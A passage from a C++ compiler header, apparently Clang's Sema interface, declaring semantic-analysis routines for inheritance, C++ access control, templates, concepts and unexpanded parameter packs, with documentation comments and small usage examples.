MutableArrayRef<CXXBaseSpecifier *> Bases);
void ActOnBaseSpecifiers(Decl *ClassDecl,
MutableArrayRef<CXXBaseSpecifier *> Bases);
bool IsDerivedFrom(SourceLocation Loc, QualType Derived, QualType Base);
bool IsDerivedFrom(SourceLocation Loc, QualType Derived, QualType Base,
CXXBasePaths &Paths);
// FIXME: I don't like this name.
void BuildBasePathArray(const CXXBasePaths &Paths, CXXCastPath &BasePath);
bool CheckDerivedToBaseConversion(QualType Derived, QualType Base,
SourceLocation Loc, SourceRange Range,
CXXCastPath *BasePath = nullptr,
bool IgnoreAccess = false);
bool CheckDerivedToBaseConversion(QualType Derived, QualType Base,
unsigned InaccessibleBaseID,
unsigned AmbiguousBaseConvID,
SourceLocation Loc, SourceRange Range,
DeclarationName Name,
CXXCastPath *BasePath,
bool IgnoreAccess = false);
std::string getAmbiguousPathsDisplayString(CXXBasePaths &Paths);
bool CheckOverridingFunctionAttributes(const CXXMethodDecl *New,
const CXXMethodDecl *Old);
/// CheckOverridingFunctionReturnType - Checks whether the return types are
/// covariant, according to C++ [class.virtual]p5.
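/// For example:
/// \code
///   struct B { virtual B *clone(); };
///   struct D : B { D *clone() override; }; // covariant return type
/// \endcode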
bool CheckOverridingFunctionReturnType(const CXXMethodDecl *New,
const CXXMethodDecl *Old);
/// CheckOverridingFunctionExceptionSpec - Checks whether the exception
/// spec is a subset of base spec.
bool CheckOverridingFunctionExceptionSpec(const CXXMethodDecl *New,
const CXXMethodDecl *Old);
bool CheckPureMethod(CXXMethodDecl *Method, SourceRange InitRange);
/// CheckOverrideControl - Check C++11 override control semantics.
void CheckOverrideControl(NamedDecl *D);
/// DiagnoseAbsenceOfOverrideControl - Diagnose if the 'override' keyword was
/// not used in the declaration of an overriding method.
void DiagnoseAbsenceOfOverrideControl(NamedDecl *D);
/// CheckForFunctionMarkedFinal - Checks whether a virtual member function
/// overrides a virtual member function marked 'final', according to
/// C++11 [class.virtual]p4.
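/// For example:
/// \code
///   struct B { virtual void f() final; };
///   struct D : B { void f(); }; // error: overrides a 'final' function
/// \endcode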
bool CheckIfOverriddenFunctionIsMarkedFinal(const CXXMethodDecl *New,
const CXXMethodDecl *Old);
//===--------------------------------------------------------------------===//
// C++ Access Control
//
enum AccessResult {
AR_accessible,
AR_inaccessible,
AR_dependent,
AR_delayed
};
bool SetMemberAccessSpecifier(NamedDecl *MemberDecl,
NamedDecl *PrevMemberDecl,
AccessSpecifier LexicalAS);
AccessResult CheckUnresolvedMemberAccess(UnresolvedMemberExpr *E,
DeclAccessPair FoundDecl);
AccessResult CheckUnresolvedLookupAccess(UnresolvedLookupExpr *E,
DeclAccessPair FoundDecl);
AccessResult CheckAllocationAccess(SourceLocation OperatorLoc,
SourceRange PlacementRange,
CXXRecordDecl *NamingClass,
DeclAccessPair FoundDecl,
bool Diagnose = true);
AccessResult CheckConstructorAccess(SourceLocation Loc,
CXXConstructorDecl *D,
DeclAccessPair FoundDecl,
const InitializedEntity &Entity,
bool IsCopyBindingRefToTemp = false);
AccessResult CheckConstructorAccess(SourceLocation Loc,
CXXConstructorDecl *D,
DeclAccessPair FoundDecl,
const InitializedEntity &Entity,
const PartialDiagnostic &PDiag);
AccessResult CheckDestructorAccess(SourceLocation Loc,
CXXDestructorDecl *Dtor,
const PartialDiagnostic &PDiag,
QualType objectType = QualType());
AccessResult CheckFriendAccess(NamedDecl *D);
AccessResult CheckMemberAccess(SourceLocation UseLoc,
CXXRecordDecl *NamingClass,
DeclAccessPair Found);
AccessResult
CheckStructuredBindingMemberAccess(SourceLocation UseLoc,
CXXRecordDecl *DecomposedClass,
DeclAccessPair Field);
AccessResult CheckMemberOperatorAccess(SourceLocation Loc,
Expr *ObjectExpr,
Expr *ArgExpr,
DeclAccessPair FoundDecl);
AccessResult CheckAddressOfMemberAccess(Expr *OvlExpr,
DeclAccessPair FoundDecl);
AccessResult CheckBaseClassAccess(SourceLocation AccessLoc,
QualType Base, QualType Derived,
const CXXBasePath &Path,
unsigned DiagID,
bool ForceCheck = false,
bool ForceUnprivileged = false);
void CheckLookupAccess(const LookupResult &R);
bool IsSimplyAccessible(NamedDecl *Decl, CXXRecordDecl *NamingClass,
QualType BaseType);
bool isMemberAccessibleForDeletion(CXXRecordDecl *NamingClass,
DeclAccessPair Found, QualType ObjectType,
SourceLocation Loc,
const PartialDiagnostic &Diag);
bool isMemberAccessibleForDeletion(CXXRecordDecl *NamingClass,
DeclAccessPair Found,
QualType ObjectType) {
return isMemberAccessibleForDeletion(NamingClass, Found, ObjectType,
SourceLocation(), PDiag());
}
void HandleDependentAccessCheck(const DependentDiagnostic &DD,
const MultiLevelTemplateArgumentList &TemplateArgs);
void PerformDependentDiagnostics(const DeclContext *Pattern,
const MultiLevelTemplateArgumentList &TemplateArgs);
void HandleDelayedAccessCheck(sema::DelayedDiagnostic &DD, Decl *Ctx);
/// When true, access checking violations are treated as SFINAE
/// failures rather than hard errors.
bool AccessCheckingSFINAE;
enum AbstractDiagSelID {
AbstractNone = -1,
AbstractReturnType,
AbstractParamType,
AbstractVariableType,
AbstractFieldType,
AbstractIvarType,
AbstractSynthesizedIvarType,
AbstractArrayType
};
bool isAbstractType(SourceLocation Loc, QualType T);
bool RequireNonAbstractType(SourceLocation Loc, QualType T,
TypeDiagnoser &Diagnoser);
template <typename... Ts>
bool RequireNonAbstractType(SourceLocation Loc, QualType T, unsigned DiagID,
const Ts &...Args) {
BoundTypeDiagnoser<Ts...> Diagnoser(DiagID, Args...);
return RequireNonAbstractType(Loc, T, Diagnoser);
}
void DiagnoseAbstractType(const CXXRecordDecl *RD);
//===--------------------------------------------------------------------===//
// C++ Overloaded Operators [C++ 13.5]
//
bool CheckOverloadedOperatorDeclaration(FunctionDecl *FnDecl);
bool CheckLiteralOperatorDeclaration(FunctionDecl *FnDecl);
//===--------------------------------------------------------------------===//
// C++ Templates [C++ 14]
//
void FilterAcceptableTemplateNames(LookupResult &R,
bool AllowFunctionTemplates = true,
bool AllowDependent = true);
bool hasAnyAcceptableTemplateNames(LookupResult &R,
bool AllowFunctionTemplates = true,
bool AllowDependent = true,
bool AllowNonTemplateFunctions = false);
/// Try to interpret the lookup result D as a template-name.
///
/// \param D A declaration found by name lookup.
/// \param AllowFunctionTemplates Whether function templates should be
/// considered valid results.
/// \param AllowDependent Whether unresolved using declarations (that might
/// name templates) should be considered valid results.
NamedDecl *getAsTemplateNameDecl(NamedDecl *D,
bool AllowFunctionTemplates = true,
bool AllowDependent = true);
enum TemplateNameIsRequiredTag { TemplateNameIsRequired };
/// Whether and why a template name is required in this lookup.
class RequiredTemplateKind {
public:
/// Template name is required if TemplateKWLoc is valid.
RequiredTemplateKind(SourceLocation TemplateKWLoc = SourceLocation())
: TemplateKW(TemplateKWLoc) {}
/// Template name is unconditionally required.
RequiredTemplateKind(TemplateNameIsRequiredTag) : TemplateKW() {}
SourceLocation getTemplateKeywordLoc() const {
return TemplateKW.getValueOr(SourceLocation());
}
bool hasTemplateKeyword() const { return getTemplateKeywordLoc().isValid(); }
bool isRequired() const { return TemplateKW != SourceLocation(); }
explicit operator bool() const { return isRequired(); }
private:
llvm::Optional<SourceLocation> TemplateKW;
};
enum class AssumedTemplateKind {
/// This is not assumed to be a template name.
None,
/// This is assumed to be a template name because lookup found nothing.
FoundNothing,
/// This is assumed to be a template name because lookup found one or more
/// functions (but no function templates).
FoundFunctions,
};
bool LookupTemplateName(
LookupResult &R, Scope *S, CXXScopeSpec &SS, QualType ObjectType,
bool EnteringContext, bool &MemberOfUnknownSpecialization,
RequiredTemplateKind RequiredTemplate = SourceLocation(),
AssumedTemplateKind *ATK = nullptr, bool AllowTypoCorrection = true);
TemplateNameKind isTemplateName(Scope *S,
CXXScopeSpec &SS,
bool hasTemplateKeyword,
const UnqualifiedId &Name,
ParsedType ObjectType,
bool EnteringContext,
TemplateTy &Template,
bool &MemberOfUnknownSpecialization,
bool Disambiguation = false);
/// Try to resolve an undeclared template name as a type template.
///
/// Sets II to the identifier corresponding to the template name, and updates
/// Name to a corresponding (typo-corrected) type template name and TNK to
/// the corresponding kind, if possible.
void ActOnUndeclaredTypeTemplateName(Scope *S, TemplateTy &Name,
TemplateNameKind &TNK,
SourceLocation NameLoc,
IdentifierInfo *&II);
bool resolveAssumedTemplateNameAsType(Scope *S, TemplateName &Name,
SourceLocation NameLoc,
bool Diagnose = true);
/// Determine whether a particular identifier might be the name in a C++17
/// deduction-guide declaration.
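/// For example:
/// \code
///   template <typename T> struct X { X(T); };
///   X(int) -> X<int>; // 'X' is the name in a deduction-guide declaration
/// \endcode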
bool isDeductionGuideName(Scope *S, const IdentifierInfo &Name,
SourceLocation NameLoc,
ParsedTemplateTy *Template = nullptr);
bool DiagnoseUnknownTemplateName(const IdentifierInfo &II,
SourceLocation IILoc,
Scope *S,
const CXXScopeSpec *SS,
TemplateTy &SuggestedTemplate,
TemplateNameKind &SuggestedKind);
bool DiagnoseUninstantiableTemplate(SourceLocation PointOfInstantiation,
NamedDecl *Instantiation,
bool InstantiatedFromMember,
const NamedDecl *Pattern,
const NamedDecl *PatternDef,
TemplateSpecializationKind TSK,
bool Complain = true);
void DiagnoseTemplateParameterShadow(SourceLocation Loc, Decl *PrevDecl);
TemplateDecl *AdjustDeclIfTemplate(Decl *&Decl);
NamedDecl *ActOnTypeParameter(Scope *S, bool Typename,
SourceLocation EllipsisLoc,
SourceLocation KeyLoc,
IdentifierInfo *ParamName,
SourceLocation ParamNameLoc,
unsigned Depth, unsigned Position,
SourceLocation EqualLoc,
ParsedType DefaultArg, bool HasTypeConstraint);
bool ActOnTypeConstraint(const CXXScopeSpec &SS,
TemplateIdAnnotation *TypeConstraint,
TemplateTypeParmDecl *ConstrainedParameter,
SourceLocation EllipsisLoc);
bool AttachTypeConstraint(NestedNameSpecifierLoc NS,
DeclarationNameInfo NameInfo,
ConceptDecl *NamedConcept,
const TemplateArgumentListInfo *TemplateArgs,
TemplateTypeParmDecl *ConstrainedParameter,
SourceLocation EllipsisLoc);
bool AttachTypeConstraint(AutoTypeLoc TL,
NonTypeTemplateParmDecl *ConstrainedParameter,
SourceLocation EllipsisLoc);
QualType CheckNonTypeTemplateParameterType(TypeSourceInfo *&TSI,
SourceLocation Loc);
QualType CheckNonTypeTemplateParameterType(QualType T, SourceLocation Loc);
NamedDecl *ActOnNonTypeTemplateParameter(Scope *S, Declarator &D,
unsigned Depth,
unsigned Position,
SourceLocation EqualLoc,
Expr *DefaultArg);
NamedDecl *ActOnTemplateTemplateParameter(Scope *S,
SourceLocation TmpLoc,
TemplateParameterList *Params,
SourceLocation EllipsisLoc,
IdentifierInfo *ParamName,
SourceLocation ParamNameLoc,
unsigned Depth,
unsigned Position,
SourceLocation EqualLoc,
ParsedTemplateArgument DefaultArg);
TemplateParameterList *
ActOnTemplateParameterList(unsigned Depth,
SourceLocation ExportLoc,
SourceLocation TemplateLoc,
SourceLocation LAngleLoc,
ArrayRef<NamedDecl *> Params,
SourceLocation RAngleLoc,
Expr *RequiresClause);
/// The context in which we are checking a template parameter list.
enum TemplateParamListContext {
TPC_ClassTemplate,
TPC_VarTemplate,
TPC_FunctionTemplate,
TPC_ClassTemplateMember,
TPC_FriendClassTemplate,
TPC_FriendFunctionTemplate,
TPC_FriendFunctionTemplateDefinition,
TPC_TypeAliasTemplate
};
bool CheckTemplateParameterList(TemplateParameterList *NewParams,
TemplateParameterList *OldParams,
TemplateParamListContext TPC,
SkipBodyInfo *SkipBody = nullptr);
TemplateParameterList *MatchTemplateParametersToScopeSpecifier(
SourceLocation DeclStartLoc, SourceLocation DeclLoc,
const CXXScopeSpec &SS, TemplateIdAnnotation *TemplateId,
ArrayRef<TemplateParameterList *> ParamLists,
bool IsFriend, bool &IsMemberSpecialization, bool &Invalid,
bool SuppressDiagnostic = false);
DeclResult CheckClassTemplate(
Scope *S, unsigned TagSpec, TagUseKind TUK, SourceLocation KWLoc,
CXXScopeSpec &SS, IdentifierInfo *Name, SourceLocation NameLoc,
const ParsedAttributesView &Attr, TemplateParameterList *TemplateParams,
AccessSpecifier AS, SourceLocation ModulePrivateLoc,
SourceLocation FriendLoc, unsigned NumOuterTemplateParamLists,
TemplateParameterList **OuterTemplateParamLists,
SkipBodyInfo *SkipBody = nullptr);
TemplateArgumentLoc getTrivialTemplateArgumentLoc(const TemplateArgument &Arg,
QualType NTTPType,
SourceLocation Loc);
/// Get a template argument mapping the given template parameter to itself,
/// e.g. for X in \c template<int X>, this would return an expression template
/// argument referencing X.
TemplateArgumentLoc getIdentityTemplateArgumentLoc(NamedDecl *Param,
SourceLocation Location);
void translateTemplateArguments(const ASTTemplateArgsPtr &In,
TemplateArgumentListInfo &Out);
ParsedTemplateArgument ActOnTemplateTypeArgument(TypeResult ParsedType);
void NoteAllFoundTemplates(TemplateName Name);
QualType CheckTemplateIdType(TemplateName Template,
SourceLocation TemplateLoc,
TemplateArgumentListInfo &TemplateArgs);
TypeResult
ActOnTemplateIdType(Scope *S, CXXScopeSpec &SS, SourceLocation TemplateKWLoc,
TemplateTy Template, IdentifierInfo *TemplateII,
SourceLocation TemplateIILoc, SourceLocation LAngleLoc,
ASTTemplateArgsPtr TemplateArgs, SourceLocation RAngleLoc,
bool IsCtorOrDtorName = false, bool IsClassName = false);
/// Parsed an elaborated-type-specifier that refers to a template-id,
/// such as \c class T::template apply<U>.
TypeResult ActOnTagTemplateIdType(TagUseKind TUK,
TypeSpecifierType TagSpec,
SourceLocation TagLoc,
CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
TemplateTy TemplateD,
SourceLocation TemplateLoc,
SourceLocation LAngleLoc,
ASTTemplateArgsPtr TemplateArgsIn,
SourceLocation RAngleLoc);
DeclResult ActOnVarTemplateSpecialization(
Scope *S, Declarator &D, TypeSourceInfo *DI,
SourceLocation TemplateKWLoc, TemplateParameterList *TemplateParams,
StorageClass SC, bool IsPartialSpecialization);
DeclResult CheckVarTemplateId(VarTemplateDecl *Template,
SourceLocation TemplateLoc,
SourceLocation TemplateNameLoc,
const TemplateArgumentListInfo &TemplateArgs);
ExprResult CheckVarTemplateId(const CXXScopeSpec &SS,
const DeclarationNameInfo &NameInfo,
VarTemplateDecl *Template,
SourceLocation TemplateLoc,
const TemplateArgumentListInfo *TemplateArgs);
ExprResult
CheckConceptTemplateId(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
const DeclarationNameInfo &ConceptNameInfo,
NamedDecl *FoundDecl, ConceptDecl *NamedConcept,
const TemplateArgumentListInfo *TemplateArgs);
void diagnoseMissingTemplateArguments(TemplateName Name, SourceLocation Loc);
ExprResult BuildTemplateIdExpr(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
LookupResult &R,
bool RequiresADL,
const TemplateArgumentListInfo *TemplateArgs);
ExprResult BuildQualifiedTemplateIdExpr(CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
const DeclarationNameInfo &NameInfo,
const TemplateArgumentListInfo *TemplateArgs);
TemplateNameKind ActOnTemplateName(
Scope *S, CXXScopeSpec &SS, SourceLocation TemplateKWLoc,
const UnqualifiedId &Name, ParsedType ObjectType, bool EnteringContext,
TemplateTy &Template, bool AllowInjectedClassName = false);
DeclResult ActOnClassTemplateSpecialization(
Scope *S, unsigned TagSpec, TagUseKind TUK, SourceLocation KWLoc,
SourceLocation ModulePrivateLoc, CXXScopeSpec &SS,
TemplateIdAnnotation &TemplateId, const ParsedAttributesView &Attr,
MultiTemplateParamsArg TemplateParameterLists,
SkipBodyInfo *SkipBody = nullptr);
bool CheckTemplatePartialSpecializationArgs(SourceLocation Loc,
TemplateDecl *PrimaryTemplate,
unsigned NumExplicitArgs,
ArrayRef<TemplateArgument> Args);
void CheckTemplatePartialSpecialization(
ClassTemplatePartialSpecializationDecl *Partial);
void CheckTemplatePartialSpecialization(
VarTemplatePartialSpecializationDecl *Partial);
Decl *ActOnTemplateDeclarator(Scope *S,
MultiTemplateParamsArg TemplateParameterLists,
Declarator &D);
bool
CheckSpecializationInstantiationRedecl(SourceLocation NewLoc,
TemplateSpecializationKind NewTSK,
NamedDecl *PrevDecl,
TemplateSpecializationKind PrevTSK,
SourceLocation PrevPtOfInstantiation,
bool &SuppressNew);
bool CheckDependentFunctionTemplateSpecialization(FunctionDecl *FD,
const TemplateArgumentListInfo &ExplicitTemplateArgs,
LookupResult &Previous);
bool CheckFunctionTemplateSpecialization(
FunctionDecl *FD, TemplateArgumentListInfo *ExplicitTemplateArgs,
LookupResult &Previous, bool QualifiedFriend = false);
bool CheckMemberSpecialization(NamedDecl *Member, LookupResult &Previous);
void CompleteMemberSpecialization(NamedDecl *Member, LookupResult &Previous);
DeclResult ActOnExplicitInstantiation(
Scope *S, SourceLocation ExternLoc, SourceLocation TemplateLoc,
unsigned TagSpec, SourceLocation KWLoc, const CXXScopeSpec &SS,
TemplateTy Template, SourceLocation TemplateNameLoc,
SourceLocation LAngleLoc, ASTTemplateArgsPtr TemplateArgs,
SourceLocation RAngleLoc, const ParsedAttributesView &Attr);
DeclResult ActOnExplicitInstantiation(Scope *S, SourceLocation ExternLoc,
SourceLocation TemplateLoc,
unsigned TagSpec, SourceLocation KWLoc,
CXXScopeSpec &SS, IdentifierInfo *Name,
SourceLocation NameLoc,
const ParsedAttributesView &Attr);
DeclResult ActOnExplicitInstantiation(Scope *S,
SourceLocation ExternLoc,
SourceLocation TemplateLoc,
Declarator &D);
TemplateArgumentLoc
SubstDefaultTemplateArgumentIfAvailable(TemplateDecl *Template,
SourceLocation TemplateLoc,
SourceLocation RAngleLoc,
Decl *Param,
SmallVectorImpl<TemplateArgument>
&Converted,
bool &HasDefaultArg);
/// Specifies the context in which a particular template
/// argument is being checked.
enum CheckTemplateArgumentKind {
/// The template argument was specified in the code or was
/// instantiated with some deduced template arguments.
CTAK_Specified,
/// The template argument was deduced via template argument
/// deduction.
CTAK_Deduced,
/// The template argument was deduced from an array bound
/// via template argument deduction.
CTAK_DeducedFromArrayBound
};
bool CheckTemplateArgument(NamedDecl *Param,
TemplateArgumentLoc &Arg,
NamedDecl *Template,
SourceLocation TemplateLoc,
SourceLocation RAngleLoc,
unsigned ArgumentPackIndex,
SmallVectorImpl<TemplateArgument> &Converted,
CheckTemplateArgumentKind CTAK = CTAK_Specified);
/// Check that the given template arguments can be provided to
/// the given template, converting the arguments along the way.
///
/// \param Template The template to which the template arguments are being
/// provided.
///
/// \param TemplateLoc The location of the template name in the source.
///
/// \param TemplateArgs The list of template arguments. If the template is
/// a template template parameter, this function may extend the set of
/// template arguments to also include substituted, defaulted template
/// arguments.
///
/// \param PartialTemplateArgs True if the list of template arguments is
/// intentionally partial, e.g., because we're checking just the initial
/// set of template arguments.
///
/// \param Converted Will receive the converted, canonicalized template
/// arguments.
///
/// \param UpdateArgsWithConversions If \c true, update \p TemplateArgs to
/// contain the converted forms of the template arguments as written.
/// Otherwise, \p TemplateArgs will not be modified.
///
/// \param ConstraintsNotSatisfied If provided, and an error occurred, will
/// receive true if the cause for the error is the associated constraints of
/// the template not being satisfied by the template arguments.
///
/// \returns true if an error occurred, false otherwise.
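///
/// A minimal usage sketch (illustrative only; \c Template, \c Loc, and
/// \c ArgsInfo are assumed to be in scope):
/// \code
///   SmallVector<TemplateArgument, 4> Converted;
///   if (CheckTemplateArgumentList(Template, Loc, ArgsInfo,
///                                 /*PartialTemplateArgs=*/false, Converted))
///     return true; // a diagnostic has already been emitted
///   // On success, Converted holds the canonicalized arguments.
/// \endcode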
bool CheckTemplateArgumentList(TemplateDecl *Template,
SourceLocation TemplateLoc,
TemplateArgumentListInfo &TemplateArgs,
bool PartialTemplateArgs,
SmallVectorImpl<TemplateArgument> &Converted,
bool UpdateArgsWithConversions = true,
bool *ConstraintsNotSatisfied = nullptr);
bool CheckTemplateTypeArgument(TemplateTypeParmDecl *Param,
TemplateArgumentLoc &Arg,
SmallVectorImpl<TemplateArgument> &Converted);
bool CheckTemplateArgument(TemplateTypeParmDecl *Param,
TypeSourceInfo *Arg);
ExprResult CheckTemplateArgument(NonTypeTemplateParmDecl *Param,
QualType InstantiatedParamType, Expr *Arg,
TemplateArgument &Converted,
CheckTemplateArgumentKind CTAK = CTAK_Specified);
bool CheckTemplateTemplateArgument(TemplateTemplateParmDecl *Param,
TemplateParameterList *Params,
TemplateArgumentLoc &Arg);
ExprResult
BuildExpressionFromDeclTemplateArgument(const TemplateArgument &Arg,
QualType ParamType,
SourceLocation Loc);
ExprResult
BuildExpressionFromIntegralTemplateArgument(const TemplateArgument &Arg,
SourceLocation Loc);
/// Enumeration describing how template parameter lists are compared
/// for equality.
enum TemplateParameterListEqualKind {
/// We are matching the template parameter lists of two templates
/// that might be redeclarations.
///
/// \code
/// template<typename T> struct X;
/// template<typename T> struct X;
/// \endcode
TPL_TemplateMatch,
/// We are matching the template parameter lists of two template
/// template parameters as part of matching the template parameter lists
/// of two templates that might be redeclarations.
///
/// \code
/// template<template<int I> class TT> struct X;
/// template<template<int Value> class Other> struct X;
/// \endcode
TPL_TemplateTemplateParmMatch,
/// We are matching the template parameter lists of a template
/// template argument against the template parameter lists of a template
/// template parameter.
///
/// \code
/// template<template<int Value> class Metafun> struct X;
/// template<int Value> struct integer_c;
/// X<integer_c> xic;
/// \endcode
TPL_TemplateTemplateArgumentMatch
};
bool TemplateParameterListsAreEqual(TemplateParameterList *New,
TemplateParameterList *Old,
bool Complain,
TemplateParameterListEqualKind Kind,
SourceLocation TemplateArgLoc
= SourceLocation());
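// Illustrative sketch, not part of the original interface docs: comparing the
// parameter lists of two possible redeclarations (New and Old are assumed to
// be TemplateDecl pointers in scope).
//
//   if (!TemplateParameterListsAreEqual(New->getTemplateParameters(),
//                                       Old->getTemplateParameters(),
//                                       /*Complain=*/true, TPL_TemplateMatch))
//     return true; // lists differ; a diagnostic was emitted when Complain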
bool CheckTemplateDeclScope(Scope *S, TemplateParameterList *TemplateParams);
/// Called when the parser has parsed a C++ typename
/// specifier, e.g., "typename T::type".
///
/// \param S The scope in which this typename type occurs.
/// \param TypenameLoc the location of the 'typename' keyword
/// \param SS the nested-name-specifier following the typename (e.g., 'T::').
/// \param II the identifier we're retrieving (e.g., 'type' in the example).
/// \param IdLoc the location of the identifier.
TypeResult
ActOnTypenameType(Scope *S, SourceLocation TypenameLoc,
const CXXScopeSpec &SS, const IdentifierInfo &II,
SourceLocation IdLoc);
/// Called when the parser has parsed a C++ typename
/// specifier that ends in a template-id, e.g.,
/// "typename MetaFun::template apply<T1, T2>".
///
/// \param S The scope in which this typename type occurs.
/// \param TypenameLoc the location of the 'typename' keyword
/// \param SS the nested-name-specifier following the typename (e.g., 'T::').
/// \param TemplateLoc the location of the 'template' keyword, if any.
/// \param TemplateName The template name.
/// \param TemplateII The identifier used to name the template.
/// \param TemplateIILoc The location of the template name.
/// \param LAngleLoc The location of the opening angle bracket ('<').
/// \param TemplateArgs The template arguments.
/// \param RAngleLoc The location of the closing angle bracket ('>').
TypeResult
ActOnTypenameType(Scope *S, SourceLocation TypenameLoc,
const CXXScopeSpec &SS,
SourceLocation TemplateLoc,
TemplateTy TemplateName,
IdentifierInfo *TemplateII,
SourceLocation TemplateIILoc,
SourceLocation LAngleLoc,
ASTTemplateArgsPtr TemplateArgs,
SourceLocation RAngleLoc);
QualType CheckTypenameType(ElaboratedTypeKeyword Keyword,
SourceLocation KeywordLoc,
NestedNameSpecifierLoc QualifierLoc,
const IdentifierInfo &II,
SourceLocation IILoc,
TypeSourceInfo **TSI,
bool DeducedTSTContext);
QualType CheckTypenameType(ElaboratedTypeKeyword Keyword,
SourceLocation KeywordLoc,
NestedNameSpecifierLoc QualifierLoc,
const IdentifierInfo &II,
SourceLocation IILoc,
bool DeducedTSTContext = true);
TypeSourceInfo *RebuildTypeInCurrentInstantiation(TypeSourceInfo *T,
SourceLocation Loc,
DeclarationName Name);
bool RebuildNestedNameSpecifierInCurrentInstantiation(CXXScopeSpec &SS);
ExprResult RebuildExprInCurrentInstantiation(Expr *E);
bool RebuildTemplateParamsInCurrentInstantiation(
TemplateParameterList *Params);
std::string
getTemplateArgumentBindingsText(const TemplateParameterList *Params,
const TemplateArgumentList &Args);
std::string
getTemplateArgumentBindingsText(const TemplateParameterList *Params,
const TemplateArgument *Args,
unsigned NumArgs);
//===--------------------------------------------------------------------===//
// C++ Concepts
//===--------------------------------------------------------------------===//
Decl *ActOnConceptDefinition(
Scope *S, MultiTemplateParamsArg TemplateParameterLists,
IdentifierInfo *Name, SourceLocation NameLoc, Expr *ConstraintExpr);
RequiresExprBodyDecl *
ActOnStartRequiresExpr(SourceLocation RequiresKWLoc,
ArrayRef<ParmVarDecl *> LocalParameters,
Scope *BodyScope);
void ActOnFinishRequiresExpr();
concepts::Requirement *ActOnSimpleRequirement(Expr *E);
concepts::Requirement *ActOnTypeRequirement(
SourceLocation TypenameKWLoc, CXXScopeSpec &SS, SourceLocation NameLoc,
IdentifierInfo *TypeName, TemplateIdAnnotation *TemplateId);
concepts::Requirement *ActOnCompoundRequirement(Expr *E,
SourceLocation NoexceptLoc);
concepts::Requirement *
ActOnCompoundRequirement(
Expr *E, SourceLocation NoexceptLoc, CXXScopeSpec &SS,
TemplateIdAnnotation *TypeConstraint, unsigned Depth);
concepts::Requirement *ActOnNestedRequirement(Expr *Constraint);
concepts::ExprRequirement *
BuildExprRequirement(
Expr *E, bool IsSatisfied, SourceLocation NoexceptLoc,
concepts::ExprRequirement::ReturnTypeRequirement ReturnTypeRequirement);
concepts::ExprRequirement *
BuildExprRequirement(
concepts::Requirement::SubstitutionDiagnostic *ExprSubstDiag,
bool IsSatisfied, SourceLocation NoexceptLoc,
concepts::ExprRequirement::ReturnTypeRequirement ReturnTypeRequirement);
concepts::TypeRequirement *BuildTypeRequirement(TypeSourceInfo *Type);
concepts::TypeRequirement *
BuildTypeRequirement(
concepts::Requirement::SubstitutionDiagnostic *SubstDiag);
concepts::NestedRequirement *BuildNestedRequirement(Expr *E);
concepts::NestedRequirement *
BuildNestedRequirement(
concepts::Requirement::SubstitutionDiagnostic *SubstDiag);
ExprResult ActOnRequiresExpr(SourceLocation RequiresKWLoc,
RequiresExprBodyDecl *Body,
ArrayRef<ParmVarDecl *> LocalParameters,
ArrayRef<concepts::Requirement *> Requirements,
SourceLocation ClosingBraceLoc);
//===--------------------------------------------------------------------===//
// C++ Variadic Templates (C++0x [temp.variadic])
//===--------------------------------------------------------------------===//
/// Determine whether an unexpanded parameter pack might be permitted in this
/// location. Useful for error recovery.
bool isUnexpandedParameterPackPermitted();
/// The context in which an unexpanded parameter pack is
/// being diagnosed.
///
/// Note that the values of this enumeration line up with the first
/// argument to the \c err_unexpanded_parameter_pack diagnostic.
enum UnexpandedParameterPackContext {
/// An arbitrary expression.
UPPC_Expression = 0,
/// The base type of a class type.
UPPC_BaseType,
/// The type of an arbitrary declaration.
UPPC_DeclarationType,
/// The type of a data member.
UPPC_DataMemberType,
/// The size of a bit-field.
UPPC_BitFieldWidth,
/// The expression in a static assertion.
UPPC_StaticAssertExpression,
/// The fixed underlying type of an enumeration.
UPPC_FixedUnderlyingType,
/// The enumerator value.
UPPC_EnumeratorValue,
/// A using declaration.
UPPC_UsingDeclaration,
/// A friend declaration.
UPPC_FriendDeclaration,
/// A declaration qualifier.
UPPC_DeclarationQualifier,
/// An initializer.
UPPC_Initializer,
/// A default argument.
UPPC_DefaultArgument,
/// The type of a non-type template parameter.
UPPC_NonTypeTemplateParameterType,
/// The type of an exception.
UPPC_ExceptionType,
/// Partial specialization.
UPPC_PartialSpecialization,
/// Microsoft __if_exists.
UPPC_IfExists,
/// Microsoft __if_not_exists.
UPPC_IfNotExists,
/// Lambda expression.
UPPC_Lambda,
/// Block expression.
UPPC_Block,
/// A type constraint.
UPPC_TypeConstraint
};
/// Diagnose unexpanded parameter packs.
///
/// \param Loc The location at which we should emit the diagnostic.
///
/// \param UPPC The context in which we are diagnosing unexpanded
/// parameter packs.
///
/// \param Unexpanded the set of unexpanded parameter packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPacks(SourceLocation Loc,
UnexpandedParameterPackContext UPPC,
ArrayRef<UnexpandedParameterPack> Unexpanded);
/// If the given type contains an unexpanded parameter pack,
/// diagnose the error.
///
/// \param Loc The source location where a diagnostic should be emitted.
///
/// \param T The type that is being checked for unexpanded parameter
/// packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPack(SourceLocation Loc, TypeSourceInfo *T,
UnexpandedParameterPackContext UPPC);
/// If the given expression contains an unexpanded parameter
/// pack, diagnose the error.
///
/// \param E The expression that is being checked for unexpanded
/// parameter packs.
///
/// \returns true if an error occurred, false otherwise.
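///
/// A typical guard, sketched for illustration (\c Init is an assumed
/// expression in scope):
/// \code
///   if (DiagnoseUnexpandedParameterPack(Init, UPPC_Initializer))
///     return ExprError(); // Init mentions a pack outside an expansion
/// \endcode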
bool DiagnoseUnexpandedParameterPack(Expr *E,
UnexpandedParameterPackContext UPPC = UPPC_Expression);
/// If the given nested-name-specifier contains an unexpanded
/// parameter pack, diagnose the error.
///
/// \param SS The nested-name-specifier that is being checked for
/// unexpanded parameter packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPack(const CXXScopeSpec &SS,
UnexpandedParameterPackContext UPPC);
/// If the given name contains an unexpanded parameter pack,
/// diagnose the error.
///
/// \param NameInfo The name (with source location information) that
/// is being checked for unexpanded parameter packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPack(const DeclarationNameInfo &NameInfo,
UnexpandedParameterPackContext UPPC);
/// If the given template name contains an unexpanded parameter pack,
/// diagnose the error.
///
/// \param Loc The location of the template name.
///
